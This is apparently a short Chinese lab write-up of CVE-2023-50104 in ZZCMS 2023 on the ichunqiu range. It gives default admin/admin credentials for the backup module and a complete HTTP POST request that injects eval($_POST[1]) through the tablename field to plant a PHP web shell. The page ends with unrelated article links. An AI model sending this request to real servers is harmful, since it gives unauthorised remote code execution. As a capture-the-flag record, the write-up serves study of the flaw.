当前位置: 首页 > news >正文

春秋云镜(ZZCMS 2023)·CVE-2023-50104

漏洞参考说明:GitHub - zzq66/cve4

漏洞复现:

1、访问 URL/3/E_bak5.1/upload/index.php

2、使用默认账户密码admin/admin登录

3、上传恶意语句

修改tablename字段为eval($_POST[1])

POST /3/E_bak5.1/upload/phomebak.php HTTP/1.1
Host: eci-2zehp12rmmf1osigsy24.cloudeci1.ichunqiu.com
Content-Length: 328
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2zehp12rmmf1osigsy24.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://eci-2zehp12rmmf1osigsy24.cloudeci1.ichunqiu.com/3/E_bak5.1/upload/ChangeTable.php?mydbname=information_schema
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1724806285,1724895553,1724920079,1724978435; HMACCOUNT=D7A4ECA83F3CF666; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1724991288; __tins__713776=%7B%22sid%22%3A%201724997457962%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201724999257962%7D; __51cke__=; __51laig__=1; xywpwx_bakusername=admin; xywpwx_bakrnd=zqudWbHZyxL8; xywpwx_loginebakckpass=a6bad52270d1d4855d33bcc71d3ed722; xywpwx_snsjjssbdvqm=aca496e77ae7ceff46c2f8e72f4235d5; qebak_efourcheck=be67da7f3e3c39cd439799a20c67f8b4; xywpwx_baklogintime=1724997706
Connection: closephome=DoEbak&mydbname=information_schema&savename=&oldtablepre=&newtablepre=&baktype=0&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=auto&bakdatatype=1&mypath=information_schema_20240830060146XttHTw1&insertf=replace&waitbaktime=0&readme=&autofield=&keyboard=&tablename%5B%5D=eval($_POST[1])&Submit=%BF%AA%CA%BC%B1%B8%B7%DD

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 深入探究Nginx中的URL哈希负载均衡策略
  • 引用和类型强转
  • Java算法之快速排序(Quick Sort)
  • AMD Zen 5 微架构及其市场策略
  • 简单排序(sort)
  • Openstack 与 Ceph集群搭建(完结): 配置Ceph作为Openstack后端存储
  • 如何打造基于Java SpringBoot和Vue的医院门诊智能预约平台?四步实现高效就医流程,整合MySQL数据库,优化用户体验。
  • 功能测试常用的测试用例大全
  • C#泛型相关
  • 【最新华为OD机试E卷】boos的收入(100分)-多语言题解-(Python/C/JavaScript/Java/Cpp)
  • 网易校招面试题 - 如何给 10 台机器安装 Nginx
  • 视频中间件:与海康ISC平台级联
  • RK3588 系列之1—串口连接
  • Leetcode Hot 100刷题记录 -Day6(滑动窗口)
  • Java:路径计算与障碍物处理
  • Angular 4.x 动态创建组件
  • Angular 响应式表单之下拉框
  • Javascript弹出层-初探
  • Java新版本的开发已正式进入轨道,版本号18.3
  • JS基础之数据类型、对象、原型、原型链、继承
  • Nacos系列:Nacos的Java SDK使用
  • seaborn 安装成功 + ImportError: DLL load failed: 找不到指定的模块 问题解决
  • 初识 webpack
  • 工作中总结前端开发流程--vue项目
  • 面试题:给你个id,去拿到name,多叉树遍历
  • 使用SAX解析XML
  • 想晋级高级工程师只知道表面是不够的!Git内部原理介绍
  • 【运维趟坑回忆录 开篇】初入初创, 一脸懵
  • ​configparser --- 配置文件解析器​
  • ###C语言程序设计-----C语言学习(3)#
  • #我与Java虚拟机的故事#连载06:收获颇多的经典之作
  • $.ajax中的eval及dataType
  • (1) caustics\
  • (13)DroneCAN 适配器节点(一)
  • (ZT)出版业改革:该死的死,该生的生
  • (二) 初入MySQL 【数据库管理】
  • (二十四)Flask之flask-session组件
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (含笔试题)深度解析数据在内存中的存储
  • (图文详解)小程序AppID申请以及在Hbuilderx中运行
  • (源码分析)springsecurity认证授权
  • .desktop 桌面快捷_Linux桌面环境那么多,这几款优秀的任你选
  • .Net 基于.Net8开发的一个Asp.Net Core Webapi小型易用框架
  • .net 简单实现MD5
  • .net 托管代码与非托管代码
  • .NET企业级应用架构设计系列之开场白
  • @ConfigurationProperties注解对数据的自动封装
  • []FET-430SIM508 研究日志 11.3.31
  • []串口通信 零星笔记
  • [023-2].第2节:SpringBoot中接收参数相关注解
  • [BZOJ3211]:花神游历各国(小清新线段树)
  • [C#]winform使用onnxruntime部署LYT-Net轻量级低光图像增强算法
  • [C++初阶]vector的初步理解
  • [CC2642r1] ble5 stacks 蓝牙协议栈 介绍和理解
  • [c语言]小课堂 day2